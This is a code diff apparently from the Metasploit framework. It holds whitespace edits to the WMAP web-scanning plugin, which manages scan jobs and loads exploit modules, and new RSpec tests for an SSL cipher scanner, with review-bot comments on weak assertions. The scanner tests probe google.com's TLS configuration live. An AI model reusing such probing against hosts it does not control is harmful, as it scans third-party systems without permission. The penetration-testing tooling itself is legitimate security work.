@@ -1887,39 +1914,39 @@ class Plugin::Wmap < Msf::Plugin if j==id.to_s or j.upcase == 'ALL' rpccon.call('job.stop',id) print_status("Node #{idx} Killed job id #{id} #{name}") - end + end end - end + end #rescue # print_error("No connection") #end end - idx += 1 + idx += 1 end end - + def rpc_view_jobs() indent = ' ' - + rpc_reconnect_nodes() - + if active_rpc_nodes == 0 print_error("No active nodes at this time") return end - + idx=0 - self.rpcarr.each do |k,rpccon| + self.rpcarr.each do |k,rpccon| if not rpccon print_status("[Node ##{idx}: #{k} DISABLED/NO CONNECTION]") else - - arrk = k.split('|') + + arrk = k.split('|') print_status("[Node ##{idx}: #{arrk[0]} Port:#{arrk[1]} SSL:#{arrk[2]} User:#{arrk[3]}]") - + begin n = rpccon.call('job.list') - + tbl = Rex::Ui::Text::Table.new( 'Indent' => indent.length, 'Header' => 'Jobs', 
@@ -1930,71 +1957,71 @@ class Plugin::Wmap < Msf::Plugin 'Target', 'PATH', ]) - + n.each do |id,name| - jinfo = rpccon.call('job.info',id) + jinfo = rpccon.call('job.info',id) dstore = jinfo['datastore'] tbl << [ id.to_s, name,dstore['VHOST']+":"+dstore['RPORT'],dstore['PATH']] end - + print_status tbl.to_s + "\n" - + rescue print_status("[Node ##{idx} #{k} DISABLED/NO CONNECTION]") end - end - idx += 1 - end + end + idx += 1 + end end - - + + # Modified from http://stackoverflow.com/questions/946738/detect-key-press-non-blocking-w-o-getc-gets-in-ruby - def quit? - begin - while c = driver.input.read_nonblock(1) - print_status("Quited") - return true if c == 'Q' - end - false - rescue Errno::EINTR - false - rescue Errno::EAGAIN - false - rescue EOFError - true - end - end - + def quit? + begin + while c = driver.input.read_nonblock(1) + print_status("Quited") + return true if c == 'Q' + end + false + rescue Errno::EINTR + false + rescue Errno::EAGAIN + false + rescue EOFError + true + end + end + def rpc_mon_nodes() # Pretty monitor - + color = self.opts["ConsoleDriver"].output.supports_color? rescue false - - colors = [ - '%grn', - '%blu', - '%yel', - '%whi' - ] - + + colors = [ + '%grn', + '%blu', + '%yel', + '%whi' + ] + #begin loop do rpc_reconnect_nodes() - + idx = 0 - self.rpcarr.each do |k,rpccon| - + self.rpcarr.each do |k,rpccon| + arrk = k.split('|') - + v = "NOCONN" n = 1 c = '%red' - - if not rpccon + + if not rpccon v = "NOCONN" n = 1 c = '%red' - else + else begin v = "" c = '%blu' @@ -2002,7 +2029,7 @@ class Plugin::Wmap < Msf::Plugin v = "ERROR" c = '%red' end - + begin n = rpccon.call('job.list').length c = '%blu' @@ -2011,8 +2038,8 @@ class Plugin::Wmap < Msf::Plugin v = "NOCONN" c = '%red' end - end - + end + #begin if not @stdio @stdio = Rex::Ui::Text::Output::Stdio.new 
@@ -2025,7 +2052,7 @@ class Plugin::Wmap < Msf::Plugin end msg = "[#{idx}] #{"%bld#{c}||%clr"*n} #{n} #{v}\n" @stdio.print_raw(@stdio.substitute_colors(msg)) - + #rescue #blah #end @@ -2036,8 +2063,8 @@ class Plugin::Wmap < Msf::Plugin #rescue # print_status("End.") #end - end - + end + def rpc_list_nodes() indent = ' ' @@ -2055,56 +2082,56 @@ class Plugin::Wmap < Msf::Plugin 'Status', '#jobs', ]) - + idx=0 - + rpc_reconnect_nodes() - - self.rpcarr.each do |k,rpccon| - + + self.rpcarr.each do |k,rpccon| + arrk = k.split('|') - + if not rpccon v = "NOCONN" n = "" - else + else begin v = rpccon.call('core.version')['version'] rescue v = "ERROR" end - + begin n = rpccon.call('job.list').length rescue n = "" end - end - + end + tbl << [ idx.to_s, arrk[0], arrk[1], arrk[2], arrk[3], arrk[4], v, n] idx += 1 end - + print_status tbl.to_s + "\n" end - + def active_rpc_nodes - if self.rpcarr.length == 0 + if self.rpcarr.length == 0 return 0 else - idx = 0 + idx = 0 self.rpcarr.each do |k,conn| if conn - idx += 1 + idx += 1 end end return idx - end + end end - + def view_modules indent = ' ' - + wmaptype = [:wmap_ssl, :wmap_server, :wmap_dir, @@ -2113,11 +2140,11 @@ class Plugin::Wmap < Msf::Plugin :wmap_query, :wmap_generic ] - + if not self.wmapmodules load_wmap_modules(true) end - + wmaptype.each do |modt| tbl = Rex::Ui::Text::Table.new( 
@@ -2128,53 +2155,53 @@ class Plugin::Wmap < Msf::Plugin 'Name', 'OrderID', ]) - - idx = 0 + + idx = 0 self.wmapmodules.each do |w| oid = w[3] if w[3] == 0xFFFFFF oid = ":last" end - - if w[2] == modt + + if w[2] == modt tbl << [w[0],oid] idx += 1 end - end - + end + print_status tbl.to_s + "\n" end end - + # Yes sorting hashes dont make sense but actually it does when you are enumerating one. And # sort_by of a hash returns an array so this is the reason for this ugly piece of code def sort_by_orderid(m) - temphash=Hash.new() + temphash=Hash.new() temparr=[] - - temparr = m.sort_by do |xref,v| - xref[3] + + temparr = m.sort_by do |xref,v| + xref[3] end - + temparr.each do |b| - temphash[b[0]] = b[1] + temphash[b[0]] = b[1] end temphash end - + # Load all wmap modules def load_wmap_modules(reload) if reload or not self.wmapmodules print_status("Loading wmap modules...") - + self.wmapmodules=[] - + idx = 0 [ [ framework.auxiliary, 'auxiliary' ], [framework.exploits, 'exploit' ] ].each do |mtype| # Scan all exploit modules for matching references mtype[0].each_module do |n,m| e = m.new - + # Only include wmap_enabled plugins if e.respond_to?("wmap_enabled") penabled = e.wmap_enabled @@ -2187,19 +2214,19 @@ class Plugin::Wmap < Msf::Plugin end end print_status("#{idx} wmap enabled modules loaded.") - end + end end - + def view_vulns framework.db.hosts.each do |host| - host.services.each do |serv| + host.services.each do |serv| serv.web_sites.each do |site| site.web_vulns.each do |wv| print_status("+ [#{host.address}] (#{site.vhost}): #{wv.category} #{wv.path}") print_status("\t#{wv.name} #{wv.description}") print_status("\t#{wv.method} #{wv.proof}") end - end + end end end end 
@@ -2211,20 +2238,20 @@ class Plugin::Wmap < Msf::Plugin "#{proto}://#{self[:host]}:#{self[:port]}#{self[:path]}" end end - + def initialize(framework, opts) super color = self.opts["ConsoleDriver"].output.supports_color? rescue false - + wmapversion = '1.5.1' - + wmapbanner = "%red\n.-.-.-..-.-.-..---..---.%clr\n" wmapbanner += "%red| | | || | | || | || |-'%clr\n" - wmapbanner += "%red`-----'`-'-'-'`-^-'`-'%clr\n" + wmapbanner += "%red`-----'`-'-'-'`-^-'`-'%clr\n" wmapbanner += "[WMAP #{wmapversion}] === et [ ] metasploit.com 2012\n" - + if not @stdio @stdio = Rex::Ui::Text::Output::Stdio.new end @@ -2234,7 +2261,7 @@ class Plugin::Wmap < Msf::Plugin else @stdio.disable_color end - + @stdio.print_raw(@stdio.substitute_colors(wmapbanner)) add_console_dispatcher(WmapCommandDispatcher) diff --git a/spec/lib/rex/sslscan/result_spec.rb b/spec/lib/rex/sslscan/result_spec.rb new file mode 100644 index 0000000000..bb9e667c4e --- /dev/null +++ b/spec/lib/rex/sslscan/result_spec.rb 
@@ -0,0 +1,526 @@
+require 'rex/sslscan/result'
+
+describe Rex::SSLScan::Result do
+
+ subject{Rex::SSLScan::Result.new}
+
+ it { should respond_to :accepted }
+ it { should respond_to :cert }
+ it { should respond_to :ciphers }
+ it { should respond_to :rejected }
+ it { should respond_to :sslv2 }
+ it { should respond_to :sslv3 }
+ it { should respond_to :standards_compliant? }
+ it { should respond_to :strong_ciphers }
+ it { should respond_to :supports_ssl? }
+ it { should respond_to :supports_sslv2? }
+ it { should respond_to :supports_sslv3? }
+ it { should respond_to :supports_tlsv1? }
+ it { should respond_to :supports_weak_ciphers? }
+ it { should respond_to :tlsv1 }
+ it { should respond_to :weak_ciphers }
+
+ context "with no values set" do
+ it "should return nil for the cert" do
+ subject.cert.should == nil
+ end
+
+ it "should return an empty set for ciphers" do
+ subject.ciphers.should be_empty
+ end
+
+ it "should return an empty array for accepted" do
+ subject.accepted.should == []
+ end
+
+ it "should return an empty array for rejected" do
+ subject.rejected.should == []
+ end
+
+ it "should return an empty array for #sslv2" do
+ subject.sslv2.should == []
+ end
+
+ it "should return an empty array for #sslv3" do
+ subject.sslv3.should == []
+ end
+
+ it "should return an empty array for #tlsv1" do
+ subject.tlsv1.should == []
+ end
+
+ it "should return an empty array for #weak_ciphers" do
+ subject.weak_ciphers.should == []
+ end
+
+ it "should return an empty array for #strong_ciphers" do
+ subject.strong_ciphers.should == []
+ end
+
+ it "should return false for #supports_ssl?" do
+ subject.supports_ssl?.should == false
+ end
+
+ it "should return false for #supports_ssl?v2" do
+ subject.supports_sslv2?.should == false
+ end
+
+ it "should return false for #supports_sslv3?" do
+ subject.supports_sslv3?.should == false
+ end
+
+ it "should return false for #supports_tlsv1?" do
+ subject.supports_tlsv1?.should == false
+ end
+
+ it "should return false for #supports_weak_ciphers?" do
+ subject.supports_weak_ciphers?.should == false
+ end
+
+ it "should return true for #standards_compliant?" do
+ subject.standards_compliant?.should == true
+ end
+ end
+
+ context "setting the cert" do
+ it "should accept nil" do
+ subject.cert = nil
+ subject.cert.should == nil
+ end
+
+ it "should accept an X509 cert" do
+ cert = OpenSSL::X509::Certificate.new
+ subject.cert = cert
+ subject.cert.should == cert
+ end
+
+ it "should raise an exception for anything else" do
+ expect{subject.cert = "foo"}.to raise_error
+ end
+ end
+
+ context "adding a cipher result" do
+ context "should raise an exception if" do
+ it "given an invalid SSL version" do
+ expect{subject.add_cipher(:ssl3, 'AES256-SHA', 256, :accepted )}.to raise_error
+ end
+
+ it "given SSL version as a string" do
+ expect{subject.add_cipher('sslv3', 'AES256-SHA', 256, :accepted )}.to raise_error
+ end
+
+ it "given an invalid SSL cipher" do
+ expect{subject.add_cipher(:SSLv3, 'FOO256-SHA', 256, :accepted )}.to raise_error
+ end
+
+ it "given an unsupported cipher for the version" do
+ expect{subject.add_cipher(:SSLv3, 'DES-CBC3-MD5', 256, :accepted )}.to raise_error
+ end
+
+ it "given a non-number for key length" do
+ expect{subject.add_cipher(:SSLv3, 'AES256-SHA', "256", :accepted )}.to raise_error
+ end
+
+ it "given a decimal key length" do
+ expect{subject.add_cipher(:SSLv3, 'AES256-SHA', 25.6, :accepted )}.to raise_error
+ end
+
+ it "given an invalid status" do
+ expect{subject.add_cipher(:SSLv3, 'AES256-SHA', 256, :good )}.to raise_error
+ end
+
+ it "given status as a string" do
+ expect{subject.add_cipher(:SSLv3, 'AES256-SHA', 256, "accepted" )}.to raise_error
+ end
+ end
+ context "that was accepted" do
+ it "should add an SSLv2 cipher result to the SSLv2 Accepted array or generate an SSLv2 exception" do
+ begin
+ subject.add_cipher(:SSLv2, "DES-CBC3-MD5", 168, :accepted)
+ subject.accepted(:SSLv2).should include({
+ :version => :SSLv2,
+ :cipher=>"DES-CBC3-MD5",
+ :key_length=>168,
+ :weak=> false,
+ :status => :accepted})
+ rescue ArgumentError => e
+ e.message.should == "unknown SSL method `SSLv2'."
+ end
+ end
+
+ it "should add an SSLv3 cipher result to the SSLv3 Accepted array" do
+ subject.add_cipher(:SSLv3, "AES256-SHA", 256, :accepted)
+ subject.accepted(:SSLv3).should include({
+ :version => :SSLv3,
+ :cipher=>"AES256-SHA",
+ :key_length=>256,
+ :weak=> false,
+ :status => :accepted})
+ end
+
+ it "should add an TLSv1 cipher result to the TLSv1 Accepted array" do
+ subject.add_cipher(:TLSv1, "AES256-SHA", 256, :accepted)
+ subject.accepted(:TLSv1).should include({
+ :version => :TLSv1,
+ :cipher=>"AES256-SHA",
+ :key_length=>256,
+ :weak=> false,
+ :status => :accepted})
+ end
+
+ it "should successfully add multiple entries in a row" do
+ subject.add_cipher(:SSLv3, "AES128-SHA", 128, :accepted)
+ subject.add_cipher(:SSLv3, "AES256-SHA", 256, :accepted)
+ subject.accepted(:SSLv3).should include({
+ :version => :SSLv3,
+ :cipher=>"AES256-SHA",
+ :key_length=>256,
+ :weak=> false,
+ :status => :accepted})
+ subject.accepted(:SSLv3).should include({
+ :version => :SSLv3,
+ :cipher=>"AES256-SHA",
+ :key_length=>256,
+ :weak=> false,
+ :status => :accepted})
+ end
+
+ it "should not add duplicate entries" do
+ subject.add_cipher(:SSLv3, "AES128-SHA", 128, :accepted)
+ subject.add_cipher(:SSLv3, "AES128-SHA", 128, :accepted)
+ subject.accepted(:SSLv3).count.should == 1
+ end
+ end
+ context "that was rejected" do
+ it "should add an SSLv2 cipher result to the SSLv2 Rejected array or generate an SSLv2 exception" do
+ begin
+ subject.add_cipher(:SSLv2, "DES-CBC3-MD5", 168, :rejected)
+ subject.rejected(:SSLv2).should include({
+ :version => :SSLv2,
+ :cipher=>"DES-CBC3-MD5",
+ :key_length=>168,
+ :weak=> false,
+ :status => :rejected})
+ rescue ArgumentError => e
+ e.message.should == "unknown SSL method `SSLv2'."
+ end
+ end
+
+ it "should add an SSLv3 cipher result to the SSLv3 Rejected array" do
+ subject.add_cipher(:SSLv3, "AES256-SHA", 256, :rejected)
+ subject.rejected(:SSLv3).should include({
+ :version => :SSLv3,
+ :cipher=>"AES256-SHA",
+ :key_length=>256,
+ :weak=> false,
+ :status => :rejected})
+ end
+
+ it "should add an TLSv1 cipher result to the TLSv1 Rejected array" do
+ subject.add_cipher(:TLSv1, "AES256-SHA", 256, :rejected)
+ subject.rejected(:TLSv1).should include({
+ :version => :TLSv1,
+ :cipher=>"AES256-SHA",
+ :key_length=>256,
+ :weak=> false,
+ :status => :rejected})
+ end
+
+ it "should successfully add multiple entries in a row" do
+ subject.add_cipher(:SSLv3, "AES128-SHA", 128, :rejected)
+ subject.add_cipher(:SSLv3, "AES256-SHA", 256, :rejected)
+ subject.rejected(:SSLv3).should include({
+ :version => :SSLv3,
+ :cipher=>"AES256-SHA",
+ :key_length=>256,
+ :weak=> false,
+ :status => :rejected})
+ subject.rejected(:SSLv3).should include({
+ :version => :SSLv3,
+ :cipher=>"AES128-SHA",
+ :key_length=>128,
+ :weak=> false,
+ :status => :rejected})
+ end
+
+ it "should not add duplicate entries" do
+ subject.add_cipher(:SSLv3, "AES128-SHA", 128, :rejected)
+ subject.add_cipher(:SSLv3, "AES128-SHA", 128, :rejected)
+ subject.rejected(:SSLv3).count.should == 1
+ end
+ end
+ end
+
+ context "enumerating all accepted ciphers" do
+ before(:each) do
+ subject.add_cipher(:SSLv3, "AES256-SHA", 256, :accepted)
+ subject.add_cipher(:TLSv1, "AES256-SHA", 256, :accepted)
+ subject.add_cipher(:SSLv3, "AES128-SHA", 128, :accepted)
+ end
+
+ context "with no version selected" do
+ it "should return an array of cipher detail hashes" do
+ subject.each_accepted do |cipher_details|
+ cipher_details.should include(:version, :cipher, :key_length, :status, :weak)
+ end
+ end
+
+ it "should return all of the accepted cipher details" do
+ count = 0
+ subject.each_accepted do |cipher_details|
+ count = count+1
+ end
+ count.should == 3
+ end
+ end
+
+ context "when specifying one SSL version" do
+ it "should raise an exception if not given a symbol" do
+ expect{ subject.each_accepted('sslv2')}.to raise_error
+ end
+
+ it "should raise an exception if given an invalid SSL version" do
+ expect{ subject.each_accepted(:TLSv3)}.to raise_error
+ end
+
+ it "should return only ciphers matching the version" do
+ subject.each_accepted(:SSLv3) do |cipher_details|
+ cipher_details[:version].should == :SSLv3
+ end
+ end
+ end
+
+ context "when specifying multiple SSL Versions in an array" do
+ it "should return all versions if no valid versions were supplied" do
+ count = 0
+ subject.each_accepted([:TLSv3, :TLSv4]) do |cipher_details|
+ count = count+1
+ end
+ count.should == 3
+ end
+
+ it "should return only the ciphers for the specified version" do
+ subject.each_accepted([:SSLv3,:TLSv1]) do |cipher_details|
+ cipher_details[:version].should_not == :SSLv2
+ end
+ end
+ end
+ end
+
+ context "enumerating all rejected ciphers" do
+ before(:each) do
+ subject.add_cipher(:SSLv3, "AES256-SHA", 256, :rejected)
+ subject.add_cipher(:TLSv1, "AES256-SHA", 256, :rejected)
+ subject.add_cipher(:SSLv3, "AES128-SHA", 128, :rejected)
+ end
+
+ context "with no version selected" do
+ it "should return an array of cipher detail hashes" do
+ subject.each_rejected do |cipher_details|
+ cipher_details.should include(:version, :cipher, :key_length, :status, :weak)
+ end
+ end
+
+ it "should return all of the rejected cipher details" do
+ count = 0
+ subject.each_rejected do |cipher_details|
+ count = count+1
+ end
+ count.should == 3
+ end
+ end
+
+ context "when specifying one SSL version" do
+ it "should raise an exception if not given a symbol" do
+ expect{ subject.each_rejected('sslv2')}.to raise_error
+ end
+
+ it "should raise an exception if given an invalid SSL version" do
+ expect{ subject.each_rejected(:TLSv3)}.to raise_error
+ end
+
+ it "should return only ciphers matching the version" do
+ subject.each_rejected(:SSLv3) do |cipher_details|
+ cipher_details[:version].should == :SSLv3
+ end
+ end
+ end
+
+ context "when specifying multiple SSL Versions in an array" do
+ it "should return all versions if no valid versions were supplied" do
+ count = 0
+ subject.each_rejected([:TLSv3, :TLSv4]) do |cipher_details|
+ count = count+1
+ end
+ count.should == 3
+ end
+
+ it "should return only the ciphers for the specified version" do
+ subject.each_rejected([:SSLv3,:TLSv1]) do |cipher_details|
+ cipher_details[:version].should_not == :SSLv2
+ end
+ end
+ end
+ end
+
+ context "checking SSL support" do
+ context "for SSLv2" do
+ it "should return false if there are no accepted ciphers" do
+ subject.supports_sslv2?.should == false
+ end
+ it "should return true if there are accepted ciphers or raise an SSLv2 exception" do
+ begin
+ subject.add_cipher(:SSLv2, "DES-CBC3-MD5", 168, :accepted)
+ subject.supports_sslv2?.should == true
+ rescue ArgumentError => e
+ e.message.should == "unknown SSL method `SSLv2'."
+ end
+ end
+ end
+ context "for SSLv3" do
+ it "should return false if there are no accepted ciphers" do
+ subject.supports_sslv3?.should == false
+ end
+ it "should return true if there are accepted ciphers" do
+ subject.add_cipher(:SSLv3, "AES256-SHA", 256, :accepted)
+ subject.supports_sslv3?.should == true
+ end
+ end
+ context "for TLSv1" do
+ it "should return false if there are no accepted ciphers" do
+ subject.supports_tlsv1?.should == false
+ end
+ it "should return true if there are accepted ciphers" do
+ subject.add_cipher(:TLSv1, "AES256-SHA", 256, :accepted)
+ subject.supports_tlsv1?.should == true
+ end
+ end
+ context "for SSL at large" do
+ it "should return false if there are no accepted ciphers" do
+ subject.supports_ssl?.should == false
+ end
+ it "should return true if there are accepted ciphers" do
+ subject.add_cipher(:TLSv1, "AES256-SHA", 256, :accepted)
+ subject.supports_ssl?.should == true
+ end
+ end
+ end
+
+ context "checking for weak ciphers" do
+ context "when weak ciphers are supported" do
+ before(:each) do
+ subject.add_cipher(:SSLv3, "EXP-RC4-MD5", 40, :accepted)
+ subject.add_cipher(:SSLv3, "DES-CBC-SHA", 56, :accepted)
+ end
+ it "should return an array of weak ciphers from #weak_ciphers" do
+ weak = subject.weak_ciphers
+ weak.class.should == Array
+ weak.each do |cipher|
+ cipher[:weak].should == true
+ end
+ weak.count.should == 2
+ end
+
+ it "should return true from #supports_weak_ciphers" do
+ subject.supports_weak_ciphers?.should == true
+ end
+ end
+
+ context "when no weak ciphers are supported" do
+ before(:each) do
+ subject.add_cipher(:SSLv3, "AES256-SHA", 256, :accepted)
+ subject.add_cipher(:TLSv1, "AES256-SHA", 256, :accepted)
+ subject.add_cipher(:SSLv3, "AES128-SHA", 128, :accepted)
+ end
+ it "should return an empty array from #weak_ciphers" do
+ subject.weak_ciphers.should == []
+ end
+
+ it "should return false from #supports_weak_ciphers" do
+ subject.supports_weak_ciphers?.should == false
+ end
+ end
+ end
+
+ context "checking for standards compliance" do
+ it "should return true if there is no SSL support" do
+ subject.standards_compliant?.should == true
+ end
+
+ it "should return false if SSLv2 is supported or raise an SSLv2 exception" do
+ begin
+ subject.add_cipher(:SSLv2, "DES-CBC3-MD5", 168, :accepted)
+ subject.standards_compliant?.should == false
+ rescue ArgumentError => e
+ e.message.should == "unknown SSL method `SSLv2'."
+ end
+ end
+
+ it "should return false if weak ciphers are supported" do
+ subject.add_cipher(:SSLv3, "EXP-RC2-CBC-MD5", 40, :accepted)
+ subject.standards_compliant?.should == false
+ end
+
+ it "should return true if SSLv2 and Weak Ciphers are disabled" do
+ subject.add_cipher(:SSLv3, "AES256-SHA", 256, :accepted)
+ subject.add_cipher(:TLSv1, "AES256-SHA", 256, :accepted)
+ subject.add_cipher(:SSLv3, "AES128-SHA", 128, :accepted)
+ subject.standards_compliant?.should == true
+ end
+ end
+
+ context "when printing the results" do
+ context "when OpenSSL is compiled without SSLv2" do
+ before(:each) do
+ subject.add_cipher(:SSLv3, "AES256-SHA", 256, :accepted)
+ subject.add_cipher(:TLSv1, "AES256-SHA", 256, :accepted)
+ subject.add_cipher(:SSLv3, "AES128-SHA", 128, :accepted)
+ subject.openssl_sslv2 = false
+ end
+ it "should warn the user" do
+ subject.to_s.should include "*** WARNING: Your OS hates freedom! Your OpenSSL libs are compiled without SSLv2 support!"
+ end
+ end
+
+ context "when we have SSL results" do
+ before(:each) do
+ subject.add_cipher(:SSLv3, "AES256-SHA", 256, :accepted)
+ subject.add_cipher(:TLSv1, "AES256-SHA", 256, :accepted)
+ subject.add_cipher(:SSLv3, "AES128-SHA", 128, :accepted)
+ subject.add_cipher(:SSLv3, "EXP-RC2-CBC-MD5", 40, :accepted)
+
+ cert = OpenSSL::X509::Certificate.new
+ key = OpenSSL::PKey::RSA.new 2048
+ cert.version = 2 #
+ cert.serial = 1
+ cert.subject = OpenSSL::X509::Name.parse "/DC=org/DC=ruby-lang/CN=Ruby CA"
+ cert.issuer = cert.subject
+ cert.public_key = key.public_key
+ cert.not_before = Time.now
+ cert.not_after = cert.not_before + 2 * 365 * 24 * 60 * 60 # 2
+
+ subject.cert = cert
+ end
+
+ it "should contain the certificate" do
+ subject.to_s.should include "Issuer: DC=org, DC=ruby-lang, CN=Ruby CA"
+ subject.to_s.should include "Subject: DC=org, DC=ruby-lang, CN=Ruby CA"
+ end
+
+ it "should have a table with our SSL Cipher Results" do
+ subject.to_s.should include "Accepted * SSLv3 40 EXP-RC2-CBC-MD5"
+ subject.to_s.should include "Accepted SSLv3 128 AES128-SHA"
+ subject.to_s.should include "Accepted SSLv3 256 AES256-SHA"
+ subject.to_s.should include "Accepted TLSv1 256 AES256-SHA"
+ end
+ end
+
+ it "should return an appropriate message when SSL is not supported" do
+ subject.stub(:supports_ssl?).and_return(false)
+ subject.to_s.should == "Server does not appear to support SSL on this port!"
+ end
+
+
+ end
+
+end
diff --git a/spec/lib/rex/sslscan/scanner_spec.rb b/spec/lib/rex/sslscan/scanner_spec.rb
new file mode 100644
index 0000000000..5ea65b3ebf
--- /dev/null
+++ b/spec/lib/rex/sslscan/scanner_spec.rb
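Review bot: In spec/lib/rex/sslscan/result_spec.rb, the accepted-cipher example "should successfully add multiple entries in a row" asserts the AES256-SHA hash twice, so it never checks that the AES128-SHA entry added first is still present. The second expectation should use `:cipher=>"AES128-SHA",` and `:key_length=>128,`, as the rejected counterpart further down already does. The negative cases throughout the file use a bare `expect{...}.to raise_error`, which passes on any exception, including a NoMethodError from a misspelled call, so the validation of SSL version, cipher, key length and status in `add_cipher` is not actually pinned. Naming the expected class would pin it, e.g. `.to raise_error(ArgumentError)` if that is what `add_cipher` raises (its implementation is not in this hunk). The `each_accepted`/`each_rejected` examples that assert only inside the block also pass when the block is never yielded to; a yield counter, as the neighbouring "return all" examples use, would close that gap.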
@@ -0,0 +1,106 @@
+require 'rex/sslscan/scanner'
+require 'rex/thread_factory'
+require 'rex/text'
+require 'rex/compat'
+
+describe Rex::SSLScan::Scanner do
+
+ subject{Rex::SSLScan::Scanner.new("google.com", 443)}
+
+ it { should respond_to :host }
+ it { should respond_to :port }
+ it { should respond_to :timeout }
+ it { should respond_to :valid? }
+
+ context "when validating the scanner config" do
+ it "should return true when given a valid config" do
+ subject.valid?.should == true
+ end
+
+ it "should return false if given an invalid host" do
+ subject.host = nil
+ subject.valid?.should == false
+ end
+
+ it "should return false if given an invalid port" do
+ subject.port = nil
+ subject.valid?.should == false
+ end
+
+ it "should return false if given an invalid timeout" do
+ subject.timeout = nil
+ subject.valid?.should == false
+ end
+ end
+
+ context "when testing a single cipher" do
+ context "an exception should be raised if" do
+ it "has an invalid scanner configuration" do
+ subject.host =nil
+ expect{ subject.test_cipher(:SSLv2, "AES128-SHA")}.to raise_error
+ end
+
+ it "is given an invalid SSL version" do
+ expect{ subject.test_cipher(:SSLv5, "AES128-SHA")}.to raise_error
+ end
+
+ it "is given an invalid cipher" do
+ expect{ subject.test_cipher(:SSLv2, "FOO128-SHA")}.to raise_error
+ end
+
+ it "is given an invalid cipher for the SSL Version" do
+ expect{ subject.test_cipher(:SSLv3, 'DES-CBC3-MD5')}.to raise_error
+ end
+ end
+
+ context ":rejected should be returned if" do
+ it "scans a server that doesn't support the supplied SSL version" do
+ subject.test_cipher(:SSLv3, "DES-CBC-SHA").should == :rejected
+ end
+
+ it "scans a server that doesn't support the cipher" do
+ subject.test_cipher(:SSLv3, "DHE-DSS-AES256-SHA").should == :rejected
+ end
+ end
+
+ context ":accepted should be returned if" do
+ it "scans a server that accepts the given cipher" do
+ subject.test_cipher(:SSLv3, "AES256-SHA").should == :accepted
+ end
+ end
+ end
+
+ context "when retrieving the cert" do
+ it "should return nil if it can't connect" do
+ subject.get_cert(:SSLv3, "DES-CBC-SHA").should == nil
+ end
+
+ it "should return an X509 cert if it can connect" do
+ subject.get_cert(:SSLv3, "AES256-SHA").class.should == OpenSSL::X509::Certificate
+ end
+ end
+
+ context "when scanning https://google.com" do
+ it "should return a Result object" do
+ result = subject.scan
+ result.class.should == Rex::SSLScan::Result
+ end
+
+ context "if SSLv2 is not available locally" do
+ before(:each) do
+ subject.stub(:check_opensslv2).and_return(false)
+ subject.send(:initialize, 'google.com', 443)
+ end
+ it "should mark SSLv2 as unsupported" do
+ subject.supported_versions.should_not include :SSLv2
+ subject.sslv2.should == false
+ end
+
+ it "should not test any SSLv2 ciphers" do
+ res = subject.scan
+ res.sslv2.should == []
+ end
+ end
+ end
+
+end
\ No newline at end of file
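Review bot: The examples that call `test_cipher`, `get_cert` or `scan` appear to open real TLS connections to google.com:443 (the `subject` line), so the suite needs outbound network access and sends handshake probes to a third-party host on every run. Expectations such as `test_cipher(:SSLv3, "AES256-SHA").should == :accepted` and `:rejected` for `DES-CBC-SHA` then test that server's current configuration rather than the scanner. They would be deterministic against a listener the spec controls, e.g. `subject{Rex::SSLScan::Scanner.new("127.0.0.1", test_port)}`, where `test_port` is a placeholder for a local TLS server started in `before(:all)`, or with the socket layer stubbed. Any live checks could sit behind an opt-in tag. The bare `.to raise_error` expectations also pass on any exception, and `subject.send(:initialize, 'google.com', 443)` re-runs the constructor on an existing object where building a fresh scanner after the stub would be clearer.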